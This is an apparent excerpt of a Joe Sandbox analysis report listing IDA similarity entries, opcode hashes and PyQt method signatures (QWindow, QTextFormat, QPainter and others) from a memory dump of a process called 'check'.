                                                                                                                                                                                                                                          • String ID: QWindow$setKeyboardGrabEnabled$setKeyboardGrabEnabled(self, grab: bool) -> bool
                                                                                                                                                                                                                                          • API String ID: 1802758380-1671088457
                                                                                                                                                                                                                                          • Opcode ID: 13961945c7752c22cae0dd617f93030b5996f14be50006fb7f048977731f9253
                                                                                                                                                                                                                                          • Instruction ID: a4eb8845501da95a6ea2aaf60110852ece4c0ed7aa3a3d69e0b2f53f6238a921
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13961945c7752c22cae0dd617f93030b5996f14be50006fb7f048977731f9253
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23111B36A18E46D1EB10DF20E8896A933E5FB44F84F914032DA9E43320EF3DE959C708
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?slopeDoubleFloat_FromPainterPath@@Percent@
                                                                                                                                                                                                                                          • String ID: QPainterPath$slopeAtPercent$slopeAtPercent(self, t: float) -> float
                                                                                                                                                                                                                                          • API String ID: 1007492032-3960587637
                                                                                                                                                                                                                                          • Opcode ID: 1535b535a3df342ef32397d0a4ff477161ba16411e68eee956240f3ffdd4b9c3
                                                                                                                                                                                                                                          • Instruction ID: aa757cf8983ffff64873fcd5fa22704c6680727db0a340dbfbc960be69597b4e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1535b535a3df342ef32397d0a4ff477161ba16411e68eee956240f3ffdd4b9c3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3011B76A18E46D5EB10DF20E8896A933E5FB44F94F914032DA9E03320EF39E95AC744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?intFormat@@FromLongLong_Property@Text
                                                                                                                                                                                                                                          • String ID: QTextImageFormat$quality$quality(self) -> int
                                                                                                                                                                                                                                          • API String ID: 1809571791-639887700
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?minimumFromLongLong_Size@Size@@Window@@
                                                                                                                                                                                                                                          • String ID: QWindow$minimumHeight$minimumHeight(self) -> int
                                                                                                                                                                                                                                          • API String ID: 430898146-3833431472
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?boolBool_Format@@FromLongProperty@Text
                                                                                                                                                                                                                                          • String ID: QTextTableFormat$borderCollapse$borderCollapse(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 3344510876-2026970299
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?boolBool_Format@@FromLongProperty@Text
                                                                                                                                                                                                                                          • String ID: QTextCharFormat$fontKerning$fontKerning(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 3344510876-3159943293
                                                                                                                                                                                                                                          • Opcode ID: 04320b374e9253e84794408e646076c375f54ba4eade018e346bf15dea2abbeb
                                                                                                                                                                                                                                          • Instruction ID: e25b6a6cf349366ca2408ba34c5993d618986d1e93d9905f722f645408302a17
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04320b374e9253e84794408e646076c375f54ba4eade018e346bf15dea2abbeb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2010876A08A86D1EB10DF51E8896A933E4FB44BD4F914032CA9E47320EF7DE669C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?intFormat@@FromLongLong_Property@Text
                                                                                                                                                                                                                                          • String ID: QTextBlockFormat$indent$indent(self) -> int
                                                                                                                                                                                                                                          • API String ID: 1809571791-2543352704
                                                                                                                                                                                                                                          • Opcode ID: 766e025b4b947819a0021f9d55b066909cba0f18f64231e54a63cd96a4d516c6
                                                                                                                                                                                                                                          • Instruction ID: 88937f2a49158d83bba6097181b24b2e4742d50990bd77cc8675abedcfe15c60
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 766e025b4b947819a0021f9d55b066909cba0f18f64231e54a63cd96a4d516c6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63010C77A08A46C1EB109F61E8496A933E4FB44F94F918032DA9E43324EF7DE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?length@Fragment@@FromLongLong_Text
                                                                                                                                                                                                                                          • String ID: QTextFragment$length$length(self) -> int
                                                                                                                                                                                                                                          • API String ID: 3894585651-2905367999
                                                                                                                                                                                                                                          • Opcode ID: da8f611d82748ebdea820eec21723de1dd46223c9bbf2bc53f9221ccc5ced96f
                                                                                                                                                                                                                                          • Instruction ID: 53ab71a4de48aaa46e49e38a2f28609fc29e5e5e30992a64d5bc64089fa567e1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da8f611d82748ebdea820eec21723de1dd46223c9bbf2bc53f9221ccc5ced96f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50011A36A08A46C2EB109F60E8496A933A8FB84FD4F914032C98E43324EF7DE55AC344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?weight@Font@@FromLongLong_
                                                                                                                                                                                                                                          • String ID: QRawFont$weight$weight(self) -> int
                                                                                                                                                                                                                                          • API String ID: 1495005862-2304509088
                                                                                                                                                                                                                                          • Opcode ID: 57d9e1fda54ad3606fb87fd0d9dd8a563fe6de241204256db539e28b588a2d22
                                                                                                                                                                                                                                          • Instruction ID: a9f2ab38275313fd0a070cde5d1a11c3e7b3f54915a3e21116e337d59d834aa8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57d9e1fda54ad3606fb87fd0d9dd8a563fe6de241204256db539e28b588a2d22
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7011E76A08B46D1EB109F61E84A6A933E4FB44F90F918032CA9E43324EF7DE559C344
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?textFromInlineLongLong_Object@@Position@Text
                                                                                                                                                                                                                                          • String ID: QTextInlineObject$textPosition$textPosition(self) -> int
                                                                                                                                                                                                                                          • API String ID: 2776140407-124157796
                                                                                                                                                                                                                                          • Opcode ID: 582a172e992d6740ca3455f66f78b8dc35f677873c6d62a3c268a06e81df0ff2
                                                                                                                                                                                                                                          • Instruction ID: 3aaf78f0a5994741f4a052f80a1db0cfa684f9634b47b978b7485d8785b38b7e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 582a172e992d6740ca3455f66f78b8dc35f677873c6d62a3c268a06e81df0ff2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69011A36A08B46C1EB109F61E84A6A933A4FB84F94F914032C99E43334EF7DE559C344
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_FromLongNull@Vector4
                                                                                                                                                                                                                                          • String ID: QVector4D$isNull$isNull(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 3909539051-2332985828
                                                                                                                                                                                                                                          • Opcode ID: 3d35bfbdd5869d7e461e215ae19ce0d4a6bcd7502145eb25b12ac24b0aa6682d
                                                                                                                                                                                                                                          • Instruction ID: 243de5c4058c47ae5130ab3750b4f3f132def9effcb116fb1370ac4d396e98db
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d35bfbdd5869d7e461e215ae19ce0d4a6bcd7502145eb25b12ac24b0aa6682d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6012C36A08A46D1EB109F61E8896A933E4FB44FD4F914032D99E47320EF7CE56AC744
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?doubleDoubleFloat_Format@@FromProperty@Text
                                                                                                                                                                                                                                          • String ID: QTextTableFormat$cellPadding$cellPadding(self) -> float
                                                                                                                                                                                                                                          • API String ID: 2584946227-1600723810
                                                                                                                                                                                                                                          • Opcode ID: 13362e5ba8ec5c8722dfbb3e568b380f4f3d56dd7ef5db2fdcf47792cd819d56
                                                                                                                                                                                                                                          • Instruction ID: edd8f1acc7a8d8e85adf4c4ad3101f68b1069a6fc2c779e590b4ab6f9062d7dc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13362e5ba8ec5c8722dfbb3e568b380f4f3d56dd7ef5db2fdcf47792cd819d56
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA011E37A08A46D5EB109F51E8896A933E4FB44FD4F914032DA9E03324EF7CE69AC344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?hasBool_Clipping@FromLongPainter@@
                                                                                                                                                                                                                                          • String ID: QPainter$hasClipping$hasClipping(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 2826564307-3272688965
                                                                                                                                                                                                                                          • Opcode ID: b8c246f5ced8e92eca641af799bf6dc5e917110774232f18352303897fc077d2
                                                                                                                                                                                                                                          • Instruction ID: b97d1129a8456a75009cffcc76286117d66e7b989e0e2d1b8910f3fe21719b05
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b8c246f5ced8e92eca641af799bf6dc5e917110774232f18352303897fc077d2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42012C36A08B46C1EB109F11E8996A933E4FB44F90F914032D99E43320EF7CE569C384
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?lineCount@Document@@FromLongLong_Text
                                                                                                                                                                                                                                          • String ID: QTextDocument$lineCount$lineCount(self) -> int
                                                                                                                                                                                                                                          • API String ID: 3258379902-1896213649
                                                                                                                                                                                                                                          • Opcode ID: 9e412bc7ef241f319fc6e820cfbf1fcc817a01528f3604dacdac3ffc2ba983e7
                                                                                                                                                                                                                                          • Instruction ID: 5a0be12d057cb2eee1d52bbdac2fbb8413d64e028c7a224d9712ad59da6d68b2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e412bc7ef241f319fc6e820cfbf1fcc817a01528f3604dacdac3ffc2ba983e7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7012C37A08A46C1EB109F61E8496A933E4FB44FD0F914032DA8E47324EF7DE55AC388
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?showBool_FromFullHints@@LongScreen@Style
                                                                                                                                                                                                                                          • String ID: QStyleHints$showIsFullScreen$showIsFullScreen(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 854758034-4144901577
                                                                                                                                                                                                                                          • Opcode ID: a29b20e0a43de06acdb7bd249bfc9ce62130d5d90824c6d40dc7d9a297fb3508
                                                                                                                                                                                                                                          • Instruction ID: 47e5520bcae22a2eadde44c7f0d9a172fd30dcb0090733820be42c995432ebfb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a29b20e0a43de06acdb7bd249bfc9ce62130d5d90824c6d40dc7d9a297fb3508
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA011A36A09A46D1EB109F11E8496A933E4FB44BD4F914032C99E47320EF7DE669C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?rowCount@FromItem@@LongLong_Standard
                                                                                                                                                                                                                                          • String ID: QStandardItem$rowCount$rowCount(self) -> int
                                                                                                                                                                                                                                          • API String ID: 3772066395-2180684922
                                                                                                                                                                                                                                          • Opcode ID: c2610a421aa1ed75484964279e3eb4bbccaa3bc8dacf14eb66d94b3fb26af3c6
                                                                                                                                                                                                                                          • Instruction ID: 70b4771da85d19d79370f7715f0d01f2e305937d11037d2eedfc2304d573fa08
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2610a421aa1ed75484964279e3eb4bbccaa3bc8dacf14eb66d94b3fb26af3c6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45011A36A08F46C2EB109F61E8496A933A4FB44FD4F914032D98E43320EF7CE559C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?doubleDoubleFloat_Format@@FromProperty@Text
                                                                                                                                                                                                                                          • String ID: QTextTableCellFormat$bottomBorder$bottomBorder(self) -> float
                                                                                                                                                                                                                                          • API String ID: 2584946227-3667237825
                                                                                                                                                                                                                                          • Opcode ID: 78779074f744aa4e6240df6299e699332a77720c948829f0b1018ab9e57a0db3
                                                                                                                                                                                                                                          • Instruction ID: b81b8ea0489e0cd2dfc6b393c7819c0c115f693abbf4a0a9f6d980425db64fb4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78779074f744aa4e6240df6299e699332a77720c948829f0b1018ab9e57a0db3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C011E37A08A46D1EB109F51E8496A933E4FB44FD4F918032DA9E03320EF7DE959C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?characterCount@Document@@FromLongLong_Text
                                                                                                                                                                                                                                          • String ID: QTextDocument$characterCount$characterCount(self) -> int
                                                                                                                                                                                                                                          • API String ID: 881620296-2125918123
                                                                                                                                                                                                                                          • Opcode ID: a0ac70d635bbda4c68ef120a2f66dfa3ff83501cb7fbda3d90d02dc7b5a3fb7a
                                                                                                                                                                                                                                          • Instruction ID: 1e57262eb5d07dc02225688186edcf08c6703033f04d55b23b54f0d46a234fb8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0ac70d635bbda4c68ef120a2f66dfa3ff83501cb7fbda3d90d02dc7b5a3fb7a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18011A76A08A46C1EB109F61E8496A933A8FB44FD0F914032CA8E47324EF7CE569C384
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?quality@FromLongLong_Picture
                                                                                                                                                                                                                                          • String ID: QPictureIO$quality$quality(self) -> int
                                                                                                                                                                                                                                          • API String ID: 3929030510-1341373197
                                                                                                                                                                                                                                          • Opcode ID: 6959362fe077fbb36eff491c4af0609a87587c4530a19ab08087fe3f26c9a111
                                                                                                                                                                                                                                          • Instruction ID: c898a4debaba1d2193de1ade8a9da8e56e8e9824dbd3d7db3f367e1cdbfa8735
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6959362fe077fbb36eff491c4af0609a87587c4530a19ab08087fe3f26c9a111
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18012C36A08B46C2EB20DF61E8496A933A4FB44F90F914032D99E43320EF7DE659C384
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?column@Cell@@FromLongLong_TableText
                                                                                                                                                                                                                                          • String ID: QTextTableCell$column$column(self) -> int
                                                                                                                                                                                                                                          • API String ID: 799361229-1877074223
                                                                                                                                                                                                                                          • Opcode ID: 808c914b9cbabb4b5f6ffa9b6ae6735847d7f7ad31da394032f5c6c03645a777
                                                                                                                                                                                                                                          • Instruction ID: a6322d07b18c3890c0fc7f5959d9ed4324c68f739d41194348d974a85b92c853
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 808c914b9cbabb4b5f6ffa9b6ae6735847d7f7ad31da394032f5c6c03645a777
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63012C77A08B46D1EB109F61E8496A933E4FB44F90F914032C99E43324EF7DE65AC344
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_FromLongRotating@Transform@@
                                                                                                                                                                                                                                          • String ID: QTransform$isRotating$isRotating(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 2918634833-3786752346
                                                                                                                                                                                                                                          • Opcode ID: 573c8a070a5d55860e69e2bb6c31ffbd930a20e21f845455d9b0d6ae7f4998c0
                                                                                                                                                                                                                                          • Instruction ID: 6dbf57fe292d37f2fbd7237abc0c35b9550e50c3a6e1b01465a864eb97c72edc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 573c8a070a5d55860e69e2bb6c31ffbd930a20e21f845455d9b0d6ae7f4998c0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C201EC36A08A4AD1EB109F61E8496A933E4FB44FD5F914032D99E47320EF7DF669C384
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?doubleDoubleFloat_Format@@FromProperty@Text
                                                                                                                                                                                                                                          • String ID: QTextCharFormat$fontLetterSpacing$fontLetterSpacing(self) -> float
                                                                                                                                                                                                                                          • API String ID: 2584946227-72043748
                                                                                                                                                                                                                                          • Opcode ID: 4dae8562fbf63020d46b3a67a3fc7f7233b56816a713172a21d55fec755271c8
                                                                                                                                                                                                                                          • Instruction ID: ebddd69602ee38c16bfc467c470c5937855ee9bd4c7aedb1ab568afb07d85684
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4dae8562fbf63020d46b3a67a3fc7f7233b56816a713172a21d55fec755271c8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9601DA37A08A46D1EB109F61E8496A933B4FB44FD4F914032DA9E47320EF7DE659C384
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?senderFromIndex@LongLong_Object@@Signal
                                                                                                                                                                                                                                          • String ID: QRegularExpressionValidator$senderSignalIndex$senderSignalIndex(self) -> int
                                                                                                                                                                                                                                          • API String ID: 2462028585-3156835661
                                                                                                                                                                                                                                          • Opcode ID: b63ca2c6e3ea51e66f8017ef49f53720f83499bc93aa2181409828ec7d4e8e0e
                                                                                                                                                                                                                                          • Instruction ID: 805c2ad10e3384337bb7783e07dab84b1c82d0a47d79d70b299e8ea4d99b73cc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b63ca2c6e3ea51e66f8017ef49f53720f83499bc93aa2181409828ec7d4e8e0e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE011A76A09A46C1EB109F61E8496A933A4FB84F90F914132C99E47324EF7DE959C384
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?doubleDoubleFloat_Format@@FromProperty@Text
                                                                                                                                                                                                                                          • String ID: QTextBlockFormat$textIndent$textIndent(self) -> float
                                                                                                                                                                                                                                          • API String ID: 2584946227-891602922
                                                                                                                                                                                                                                          • Opcode ID: 7117c8be7260dd6131076e3d15ba2c8d84077161f857732f4dc69d92684b14da
                                                                                                                                                                                                                                          • Instruction ID: 9264d24f2e2c49c5c35d03e64606f391a8689ce578a37a578190500400d17384
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7117c8be7260dd6131076e3d15ba2c8d84077161f857732f4dc69d92684b14da
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5011A37A08A46C5EB109F51E8496A933E4FB44FD4F918032CA9E47320EF7DE69AC344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?mode@FromLayout@@LongLong_Mode@1@Page
                                                                                                                                                                                                                                          • String ID: QSurfaceFormat$alphaBufferSize$alphaBufferSize(self) -> int
                                                                                                                                                                                                                                          • API String ID: 3770405607-3301355687
                                                                                                                                                                                                                                          • Opcode ID: 8840faa4f33a9595a65b95b3a8fed405de9ff6537a274219c17d1e6c06f8fb3c
                                                                                                                                                                                                                                          • Instruction ID: 6af9656e9cafbcbf5c31407db36893678e6fe761abfe281f2ae3512baff37cb8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8840faa4f33a9595a65b95b3a8fed405de9ff6537a274219c17d1e6c06f8fb3c
